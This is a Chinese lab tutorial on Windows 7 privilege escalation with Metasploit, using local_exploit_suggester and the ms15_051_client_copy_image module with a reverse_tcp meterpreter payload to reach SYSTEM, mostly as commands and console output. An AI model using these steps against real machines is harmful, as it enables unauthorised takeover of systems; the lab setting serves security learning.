【网络安全】 MSF提权

本文章仅用于信息安全学习,请遵守相关法律法规,严禁用于非法途径。若读者因此作出任何危害网络安全的行为,后果自负,与作者无关。

环境准备:

名称系统位数IP
攻击机Kali Linux6410.3.0.231
客户端Windows 76410.3.0.234

当我们通过MSF成功登录靶机时,进行提权时如果报如下,表示没有拿到系统权限

meterpreter > getsystem# 输出
[-] priv_elevate_getsystem: Operation failed: 1726 The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
[-] Named Pipe Impersonation (PrintSpooler variant)
[-] Named Pipe Impersonation (EFSRPC variant - AKA EfsPotato)

接下我们演示如何进入提权:

1、切换 msf

meterpreter > bg# 输出
[*] Backgrounding session 2...

2、使用本地漏洞模块

# 用这个模块快速识别系统中可能被利用的漏洞
msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester# 输出
msf6 post(multi/recon/local_exploit_suggester) > 

3、设置 Session

# session 值通过 sessions -l 查看
msf6 post(multi/recon/local_exploit_suggester) > set session 2# 输出
session => 2

4、运行

msf6 post(multi/recon/local_exploit_suggester) > run# 输出[*] 10.3.0.234 - Collecting local exploits for x64/windows...
[*] 10.3.0.234 - 186 exploit checks are being tried...
[+] 10.3.0.234 - exploit/windows/local/bypassuac_dotnet_profiler: The target appears to be vulnerable.
[+] 10.3.0.234 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.3.0.234 - exploit/windows/local/bypassuac_sdclt: The target appears to be vulnerable.
[+] 10.3.0.234 - exploit/windows/local/cve_2019_1458_wizardopium: The target appears to be vulnerable.
[+] 10.3.0.234 - exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move: The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected!
[+] 10.3.0.234 - exploit/windows/local/cve_2020_1054_drawiconex_lpe: The target appears to be vulnerable.
[+] 10.3.0.234 - exploit/windows/local/cve_2021_40449: The service is running, but could not be validated. Windows 7/Windows Server 2008 R2 build detected!
[+] 10.3.0.234 - exploit/windows/local/ms10_092_schelevator: The service is running, but could not be validated.
[+] 10.3.0.234 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.3.0.234 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.3.0.234 - exploit/windows/local/ms15_078_atmfd_bof: The service is running, but could not be validated.
[+] 10.3.0.234 - exploit/windows/local/ms16_014_wmi_recv_notif: The target appears to be vulnerable.
[+] 10.3.0.234 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[*] Running check method for exploit 43 / 43
[*] 10.3.0.234 - Valid modules for session 2:
============================#   Name                                                           Potentially Vulnerable?  Check Result-   ----                                                           -----------------------  ------------1   exploit/windows/local/bypassuac_dotnet_profiler                Yes                      The target appears to be vulnerable.2   exploit/windows/local/bypassuac_eventvwr                       Yes                      The target appears to be vulnerable.3   exploit/windows/local/bypassuac_sdclt                          Yes                      The target appears to be vulnerable.4   exploit/windows/local/cve_2019_1458_wizardopium                Yes                      The target appears to be vulnerable.5   exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move   Yes                      The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected!6   exploit/windows/local/cve_2020_1054_drawiconex_lpe             Yes                      The target appears to be vulnerable.7   exploit/windows/local/cve_2021_40449                           Yes                      The service is running, but could not be validated. Windows 7/Windows Server 2008 R2 build detected!8   exploit/windows/local/ms10_092_schelevator                     Yes                      The service is running, but could not be validated.9   exploit/windows/local/ms14_058_track_popup_menu                Yes                      The target appears to be vulnerable.10  exploit/windows/local/ms15_051_client_copy_image               Yes                      The target appears to be vulnerable.11  exploit/windows/local/ms15_078_atmfd_bof                       Yes                      The service is running, but could not be validated.12  exploit/windows/local/ms16_014_wmi_recv_notif                  Yes                      The target appears to be vulnerable.13  exploit/windows/local/ms16_032_secondary_logon_handle_privesc  Yes                      The service is running, but could not be validated.14  exploit/windows/local/agnitum_outpost_acs                      No                       The target is not exploitable.15  exploit/windows/local/always_install_elevated                  No                       The target is not exploitable.16  exploit/windows/local/bits_ntlm_token_impersonation            No                       The target is not exploitable.17  exploit/windows/local/bypassuac_fodhelper                      No                       The target is not exploitable.18  exploit/windows/local/bypassuac_sluihijack                     No                       The target is not exploitable.19  exploit/windows/local/canon_driver_privesc                     No                       The target is not exploitable. No Canon TR150 driver directory found20  exploit/windows/local/capcom_sys_exec                          No                       The target is not exploitable.21  exploit/windows/local/cve_2020_0796_smbghost                   No                       The target is not exploitable.22  exploit/windows/local/cve_2020_1048_printerdemon               No                       The target is not exploitable.23  exploit/windows/local/cve_2020_1313_system_orchestrator        No                       The target is not exploitable.24  exploit/windows/local/cve_2020_1337_printerdemon               No                       The target is not exploitable.25  exploit/windows/local/cve_2020_17136                           No                       The target is not exploitable. The build number of the target machine does not appear to be a vulnerable version!26  exploit/windows/local/cve_2021_21551_dbutil_memmove            No                       The target is not exploitable.27  exploit/windows/local/cve_2022_21882_win32k                    No                       The target is not exploitable.28  exploit/windows/local/cve_2022_21999_spoolfool_privesc         No                       The target is not exploitable. Windows 7 is technically vulnerable, though it requires a reboot.29  exploit/windows/local/cve_2022_3699_lenovo_diagnostics_driver  No                       The target is not exploitable.30  exploit/windows/local/cve_2023_21768_afd_lpe                   No                       The target is not exploitable. The exploit only supports Windows 11 22H231  exploit/windows/local/gog_galaxyclientservice_privesc          No                       The target is not exploitable. Galaxy Client Service not found32  exploit/windows/local/ikeext_service                           No                       The check raised an exception.33  exploit/windows/local/lexmark_driver_privesc                   No                       The target is not exploitable. No Lexmark print drivers in the driver store34  exploit/windows/local/ms16_075_reflection                      No                       The target is not exploitable.35  exploit/windows/local/ms16_075_reflection_juicy                No                       The target is not exploitable.36  exploit/windows/local/ntapphelpcachecontrol                    No                       The check raised an exception.37  exploit/windows/local/nvidia_nvsvc                             No                       The check raised an exception.38  exploit/windows/local/panda_psevents                           No                       The target is not exploitable.39  exploit/windows/local/ricoh_driver_privesc                     No                       The target is not exploitable. No Ricoh driver directory found40  exploit/windows/local/srclient_dll_hijacking                   No                       The target is not exploitable. Target is not Windows Server 2012.41  exploit/windows/local/tokenmagic                               No                       The target is not exploitable.42  exploit/windows/local/virtual_box_opengl_escape                No                       The target is not exploitable.43  exploit/windows/local/webexec                                  No                       The check raised an exception

5、我们找到一个漏洞,注意:这里不是每个漏洞都可以成功,要多试几个

msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms15_051_client_copy_image# 输出
[*] Using configured payload windows/x64/meterpreter/reverse_tcp

6、查看这个模块的选项,这里有个注意点,因为我的靶机是 win7 64位系统,所以你通过msfvenom 生成的木马也要是64位,这里的 tartget 也要是64位的,如果不是,通过 set target 进行设置

msf6 exploit(windows/local/ms15_051_client_copy_image) > optionsModule options (exploit/windows/local/ms15_051_client_copy_image):Name     Current Setting  Required  Description----     ---------------  --------  -----------SESSION  2                yes       The session to run this module onPayload options (windows/x64/meterpreter/reverse_tcp):Name      Current Setting  Required  Description----      ---------------  --------  -----------EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)LHOST     10.3.0.231       yes       The listen address (an interface may be specified)LPORT     4444             yes       The listen port# 这里的 tartget 也要是64位的
Exploit target:Id  Name--  ----1   Windows x64

7、再次进行渗透,成功出现meterpreter ,代表成功

msf6 exploit(windows/local/ms15_051_client_copy_image) > run# 输出
[*] Started reverse TCP handler on 10.3.0.231:4444 
[*] Reflectively injecting the exploit DLL and executing it...
[*] Launching netsh to host the DLL...
[+] Process 3804 launched.
[*] Reflectively injecting the DLL into 3804...
[*] Sending stage (200774 bytes) to 10.3.0.234
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Meterpreter session 4 opened (10.3.0.231:4444 -> 10.3.0.234:52882) at 2024-03-15 11:47:15 +0800meterpreter > 

8、 查看权限

meterpreter > getuid# 成功提权
Server username: NT AUTHORITY\SYSTEM

9、再次查看 sessions

msf6 exploit(windows/local/ms15_051_client_copy_image) > sessions -l# 我们发现也多了一个
Active sessions
===============Id  Name  Type                     Information                     Connection--  ----  ----                     -----------                     ----------2         meterpreter x64/windows  tomma-PC\tomma @ TOMMA-PC       10.3.0.231:9999 -> 10.3.0.234:52740 (10.3.0.234)4         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ TOMMA-PC  10.3.0.231:4444 -> 10.3.0.234:52882 (10.3.0.234)

 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/748048.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

计算机考研|408专业课复习教程+注意事项

408其实把真题琢磨透就已经可以了!其实大部分考研党复习到最后真题都来不及刷完就要上考场 因为在考研后期时间分配真的很困难!特别是数学和408 本人双非科班出身备考408成功上岸,在这里也想给想考408的学弟学妹们一些很中肯的,…

鸿蒙Harmony应用开发—ArkTS声明式开发(基础手势:Slider)

滑动条组件,通常用于快速调节设置值,如音量调节、亮度调节等应用场景。 说明: 该组件从API Version 7开始支持。后续版本如有新增内容,则采用上角标单独标记该内容的起始版本。 子组件 无 接口 Slider(options?: SliderOption…

C++Qt学习——QPushButton、QRadioButton(单选按钮)、QCheckBox(复选按钮)

目录 1、QPushButton 1.1、创建一个新的项目,转到UI界面拖一个Push Button 1.2、Push Button的常用信号主要有四个,分别为 clicked(), pressed(), released(), toggled() 1.2.1、按住Push Button右键转到槽,选择信号函数 1.2.2、在Widget…

【C/C++ 学习笔记】函数进阶

【C/C 学习笔记】函数进阶 视频地址: Bilibili 函数默认值 如果某个位置有默认值,那么从此参数向右都需要有默认值如果函数声明有默认值,那么函数实现就不能设置默认值 function add(int a 10, int b 20) {return a b; }函数占位参数 直接使用数…

1.2 课程架构介绍:STM32H5 芯片生命周期管理与安全调试

1.2 课程架构介绍:STM32H5 芯片生命周期管理与安全调试 下面开始学习课程的第二节,简单介绍下STM32H5芯片的生命周期和安全调试,具体课程大家可以观看STM32官方录制的课程,链接:1.2. 课程架构介绍:STM32H5…

闪电网络协议设计思想剖析

1. 引言 闪电网络可能是比特币之上部署的最受期待的技术创新。闪电网络,为由 Joseph Poon 和 Tadge Dryja 于2015年首次提出的支付层,承诺支持: 用户之间几乎无限数量的链下交易,几乎免费,同时利用比特币提供的安全性…

IDEA编译安卓源码TVBox(2)

一、项目结构:主要app和player app结构 二、增加遥控器按键选台 修改LivePlayActivity.java 1、声明变量 public String channelId "";public Timer timer new Timer();public Toast mToast;2、定义方法 private void mToastShow(String s){mToast …

微信小程序-webview分享

项目背景 最近有个讨论区项目需要补充分享功能,希望可以支持在微信小程序进行分享,讨论区是基于react的h5项目,在小程序中是使用we-view进行承载的 可行性 目标是在打开web-view的页面进行分享,那就需要涉及h5和小程序的通讯问…

Unity类银河恶魔城学习记录10-10 p98 UI health bar源代码

Alex教程每一P的教程原代码加上我自己的理解初步理解写的注释,可供学习Alex教程的人参考 此代码仅为较上一P有所改变的代码 【Unity教程】从0编程制作类银河恶魔城游戏_哔哩哔哩_bilibili HealthBar_UI.cs using System.Collections; using System.Collections.G…

vue2和vue3部署到服务器子目录为空白页

问题:今天遇到vue项目部署到服务器默认hash没问题但是hhistory为空白的问题。研究了一下找到了答案记录一下 vue项目history模式部署在子路径 项目打包后默认只能部署在服务器根路径,如果想 http://www.xxx.com/demo/ 这种形式 vue3vite配置方法 在 …

计算机毕业设计-基于大数据技术下的高校舆情监测与分析

收藏和点赞,您的关注是我创作的动力 文章目录 概要 一、研究背景与意义1.1背景与意义1.2 研究内容 二、舆情监测与分析的关键技术2.1 robot协议对本设计的影响2.2 爬虫2.2.1 工作原理2.2.2 工作流程2.2.3 抓取策略2.3 scrapy架构2.3.1 scrapy:开源爬虫架…

Lua-Lua虚拟机2

Lua虚拟机是指Lua语言的执行环境,它是一种轻量级的、嵌入式的脚本语言虚拟机。Lua虚拟机可以解释执行Lua脚本,并提供了一系列的API供开发者使用。 Lua虚拟机的主要概念包括以下几个方面: 解释器:Lua虚拟机内部包含了一个解释器&a…

AcWing 4405. 统计子矩阵(双指针,前缀和)

给定一个 N M NM NM 的矩阵 A A A,请你统计有多少个子矩阵 (最小 1 1 11 11,最大 N M NM NM) 满足子矩阵中所有数的和不超过给定的整数 K K K? 输入格式 第一行包含三个整数 N , M N,M N,M 和 K K K。 之后 N N N 行每行包含 M M M 个整数…

【LinuxWindows 10系统中设置定时关机】

Windows 10系统中设置定时关机 在Windows 10系统中设置定时关机可以通过多种方式实现,以下是几种常用的方法: 方法一:命令提示符或运行窗口 打开“运行”窗口,可以按键盘上的Win R组合键; 在运行窗口中输入以下命令…

【构建工具】PostCSS快速配置

1. 安装依赖包 npm i -D postscss postcss-cli npm i -D autoperfixer postcss-preset-env npm i -D stylelint stylelint-config-standard npm i -D postcss-pxtorem// 执行命令 npx postcss style.css -o dist.css postcss // PostCSS核心包postcss-cli // PostCSS命令行a…

专业无网设备如何远程运维?向日葵远程控制能源场景案例解析

清洁能源领域,拥有庞大的上下游产业链,涉及的相关工业设备门类多、技术覆盖全、行业应用广。在这一领域内,相关专业设备的供应商的核心竞争力除了本身产品的技术能力之外,服务也是重要的一环。 某企业作为致力于节能环保方向的气…

由浅到深认识C语言(7)

该文章Github地址:https://github.com/AntonyCheng/c-notes 在此介绍一下作者开源的SpringBoot项目初始化模板(Github仓库地址:https://github.com/AntonyCheng/spring-boot-init-template & CSDN文章地址:https://blog.csdn…

云仓酒庄东莞分公司2024年日常沙龙:葡萄酒文化与品鉴之旅

原标题:云仓酒庄东莞分公司日常沙龙:葡萄酒文化与品鉴之旅,招商新机遇共融 在东莞这座充满活力的城市,云仓酒庄分公司近日举办了一场别开生面的日常沙龙活动。此次活动以葡萄酒文化与品鉴为主题,旨在让参与者深入体验…

Typecho CMS 反序列化漏洞(CVE-2018-18753)复现

1.环境搭建 项目地址:Release Typecho 1.0(14.10.10) typecho/typecho GitHub 安装: 创建数据库typecho create database typecho; 再进入安装程序,输入数据库密码,设置登录密码即可 直接使用即可 2.漏洞分析 install.php文…

[善用佳软]推荐掌握小工具:Json解析的命令行工具jq

前言: 我们在各种生产环境或者开发测试环境中,一定遇到有很多信息都是使用JSON串或者文本文件作为输入的。在没有JQ命令行工具之前,我们要从中获取真正的输入,大都把它复制到文本里头,然后使用文本编辑器进行加工整理…